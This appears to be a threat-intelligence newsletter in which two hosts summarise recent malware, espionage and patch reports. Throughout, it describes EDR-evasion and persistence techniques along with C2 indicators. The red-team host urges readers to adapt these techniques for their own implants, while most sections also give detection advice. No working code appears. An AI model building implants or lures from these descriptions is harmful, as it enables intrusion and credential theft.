EvilBit Threat Digest: Steganography Shenanigans and Espionage Escalations

Hey operators, UncleSp1d3r kicking this off with KryptoKat on the assist. This week's been a mixed bag--stealthy loaders coming back with fresh tricks, Iranian espionage squads drilling into aerospace, and the usual crop of vuln patches that remind us why we can't have nice things on the edge. No breakout ransomware waves, but the persistence plays are clever enough to keep your red-team sims spicy. Let's get into it without the fluff.

Malware Evasions: Loaders, Stealers, and Supply-Chain Surprises

Starting with a blast from the past: Splunk's dug into an evolved .NET steganography loader that's bundling Lokibot for credential theft across browsers, FTP, email, and crypto wallets. This thing hides multi-payload blobs in images or DLLs using LSB steganography, decodes them at runtime with a custom extraction tool called PixDig, and deploys via scheduled tasks or process injection for persistence. For red teams, it's a goldmine--pair the stego with API hashing and DNS queries over vbc.exe to slip past basic EDR; on the flip side, blue teams should hunt for suspicious EXE loads in %Public% or %Fonts%, anomalous schtasks.exe XML creations, and those telltale SHA256 hashes. We've seen this evolve from earlier variants, but the multi-payload flexibility and sandbox evasion (checking for AV processes) make it a step up--map it to ATT&CK T1053/1055/1497 for your next exercise. Detailed breakdowns and IOCs in Splunk's analysis and matching OTX pulse.

KryptoKat: On the defense end, monitor for vbc.exe making unexpected DNS queries and block those hashes; it's a practitioner-level threat, so layer in behavioral rules for injection and credential access.

Shifting to fresh campaigns, eSentire's tracking EVALUSION delivering Amatera Stealer (a pumped-up ACR variant) and NetSupport RAT via ClickFix lures that trick users into pasting PowerShell into the Run dialog. Amatera injects into suspended Chrome/Edge processes to bypass App-Bound Encryption, targeting 149 wallet extensions and 43 password managers for creds, browser data, and wallet exfil over obfuscated HTTP. It’s packed with PureCrypter, using WoW64 syscalls and AMSI bypass for EDR evasion, and conditionally drops NetSupport for persistent access on domain-joined or crypto-heavy boxes. Red-team angle: mimic the clipboard hijack and PowerShell deobf for social engineering chains; blue side, disable mshta.exe/Win+R via GPO, alert on WoW64 syscalls and encrypted loaders, and block C2 IPs like 91.98.229.246/45.94.47.224. Dig the eSentire report and Proofpoint on Amatera evolution.

UncleSp1d3r: The WoW64 trick is operator candy--pair it with dynamic API resolution and you'll slide past a lot of hooks. For depth, note the TTPs: T1204.002 for the malicious file prompt, T1059.001 for PowerShell, and T1555.003 for browser cred theft.

KryptoKat: Focus mitigations on user execution blocks and phishing training; MDR for chain detection.

AhnLab's dissected NKNShell, a RAT distributed via a compromised Korean VPN homepage since 2023 by the Larva-24010 cluster. It uses NKN/MQTT for C2, PowerShell loaders for evasion, and tools like MeshAgent/gs-netcat for persistence and remote access, targeting VPN users for credential/data theft. TTPs include WMI for scheduled tasks, encrypted payloads, and AI-generated scripts to blend in. Block the hashes and domains; disable PowerShell where possible and monitor for WMI anomalies. Full analysis and IOCs in AhnLab's report and OTX pulse.

UncleSp1d3r: Red-team this with NKN proxies for bidirectional C2; it's practitioner-level but resilient.

ClearFake's blending ClickFix social engineering with EtherHiding blockchain C2 to drop Vidar/AMOS stealers across Windows/macOS. They inject JS into compromised sites, use clipboard tampering and fake CAPTCHAs to coax PowerShell/AppleScript execution, then fetch payloads from Binance Smart Chain contracts. Cross-platform evasion includes junk code, permissions tweaks, and automated exfil. Block BSC eth_call to suspicious contracts and hunt injected JS/console overrides. Breakdowns in EnkiWhiteHat's analysis and TheHackerNews.

KryptoKat: Mitigate with unsigned script execution blocks and clipboard JS tamper detection.

Wrapping malware with ESET's RE on Lazarus' ScoringMathTea RAT, a modular Windows backdoor using API hashing (0x2DBB955 seed), polyalphabetic deobf, HTTP C2 with TEA/XTEA CBC encryption, and reflective DLL loading. It ties to UAV-sector targeting; scripts/YARA shared for hunters. ESET's deep dive and WeLiveSecurity.

UncleSp1d3r: Operator gold--fork the hashing and reflective loading for your implants; evasion is T1620/1106/1027.007.

Espionage Edges: APT41 and UNC1549 on the Hunt

APT41's back with a targeted cyber-espionage push against U.S. non-profits shaping policy, exploiting Log4Shell (CVE-2021-44228) and Atlassian Confluence (CVE-2022-26134) to deploy Deed RAT via DLL side-loading and LOLBins like rundll32 and msbuild. Once in, it's persistence via SSH, keylogging, screen caps, and exfil over web protocols. Hunt for vetysafe.exe/Imjpuexc.dll anomalies, restrict msbuild, and patch those externals. Details in HivePro advisory, OTX pulse, and SecurityAffairs.

KryptoKat: Defenders, enable ADCS auditing and block IOCs; this is expert-level with real intel impact.

Mandiant/Google exposed UNC1549's Iranian espionage TTPs targeting aerospace/defense via VDI supply-chain abuse (Citrix/VMware/Azure/FortiGate/NVIDIA), custom tools like TWOSTROKE/DEEPROOT/LIGHTRAIL/DCSYNCER.SLICK, and phishing for info. They use DLL search order hijacking, DCSync for creds, and Azure cloud infra for C2. Includes YARA for hunters. Mandiant/Google report and OTX pulse.

UncleSp1d3r: Red-team the DLL hijacks and VDI pivots; it's expert tradecraft for purple exercises.

Vuln and Patch Roundup: RHEL Kernels and Web Apps

Tenable's Nessus plugins lit up for RHEL kernel vulns (CVE-2025-39718 et al.), Lasso SAML, python-kdcproxy, plus Lucee, Telerik, and Drupal fixes. Critical DoS/RCE risks in kernels and web apps; update immediately. Tenable updated plugins and sample RHSA.

Another batch for Siemens OT (cleartext creds/RCE), Motex Lanscope (active RCE in KEV), FortiGate, Cisco ISE. Patches available; segment OT and restrict msbuild. Tenable plugins and Siemens advisory.

KryptoKat: Blue teams, scan and patch; these are operator-relevant for RHEL and OT environments.

Weird and Worthy: Passkeys and Custom Email Infra

ZDNet's on roaming authenticators for passkeys, weighing hardware security against cloud sync risks; use hybrids for balance. No active threat, but good for identity ops. ZDNet and FIDO Alliance.

AlienVault exposed 330 custom email domains (Aug-Sep 2025) for bot-driven fake account creation, using modified Chrome with fingerprint evasion to bypass blocklists. Block the domains and tune for bulk registration patterns. AlienVault OTX and Security Boulevard.

UncleSp1d3r: Red-team the evasion for your sims; it's practitioner-level but effective.

Closing Thoughts: Edges Are Eternal

UncleSp1d3r: From stego loaders to VDI pivots, this week's toolkit leans heavy on evasion and persistence--perfect for keeping your ops quiet and blue teams guessing. Test those APT41 chains; they're red-gold.

KryptoKat: Fundamentals first--patch edges, hunt logs, and remember: if it's exposed, it's a target. Don't repeat last week's mistakes; next week might not be so forgiving. Stay frosty, team.